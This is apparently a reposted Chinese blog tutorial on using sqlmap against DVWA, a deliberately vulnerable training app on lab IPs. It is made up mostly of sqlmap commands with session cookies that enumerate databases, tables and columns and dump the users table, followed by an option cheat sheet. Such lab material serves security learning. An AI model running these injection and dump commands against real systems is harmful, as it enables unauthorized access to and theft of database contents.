码迷,mamicode.com
首页 > 数据库 > 详细

sqlmap

时间:2018-06-17 14:23:49      阅读:269      评论:0      收藏:0      [点我收藏+]

标签:--   获取   dump   inf   dvwa   查询   分享   submit   column   

以dvwa为例
 
  1.简单试探
  sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#"
  返回sqlmap got a 302 redirect to xxx ,是一个重定向,考虑是否需要加入cookie信息。

技术分享图片
 
  2.加入cookie
  sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7hgqg3g3dubae6fooohnln6ec3"
  返回基本信息
技术分享图片
 
  3.遍历数据库
   sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7hgqg3g3dubae6fooohnln6ec3" --batch --dbs

技术分享图片
   
   4.指定数据库获取表名
   sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7hgqg3g3dubae6fooohnln6ec3" --batch -D dvwa --tables
   
   5.获取整个数据表名
    sqlmap -u "http://10.2.4.120/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=7hgqg3g3dubae6fooohnln6ec3" --batch --tables

 

   6.获取数据库中的列名

 sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=e84hnis7j1foicbldkl82qi480" --batch -D dvwa -T users --columns

 

   7.获取数据库内容

   sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=e84hnis7j1foicbldkl82qi480" --batch -D dvwa -T users --dump
   技术分享图片

    8.不知道当前数据库是哪一个?

   sqlmap -u "http://192.168.0.102/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low;PHPSESSID=e84hnis7j1foicbldkl82qi480" --batch --current-db --dump


   -batch 选项选择默认项
  -a  遍历所有数据库
  --current-db  获取当前数据库名(两个“--”)
  --dbs 获取所有数据库(两个“--”)
  --tables  获取所有数据库的表名(两个“--”)
  --columns 获取所有数据库的表的列名(两个“--”)
  -D  指定数据库
  -T  指定表名
  -C  指定列名
  --dump  获取查询结果
  --dump-all  获取整个数据库结果
  --stop=x  x是一个整数,表示筛选结果多少条
  由此可见,条件选项可以叠加。一个“-”表示条件,两个“--”表示获取对象的值

sqlmap

标签:--   获取   dump   inf   dvwa   查询   分享   submit   column   

原文地址:https://www.cnblogs.com/lyxin/p/9192665.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!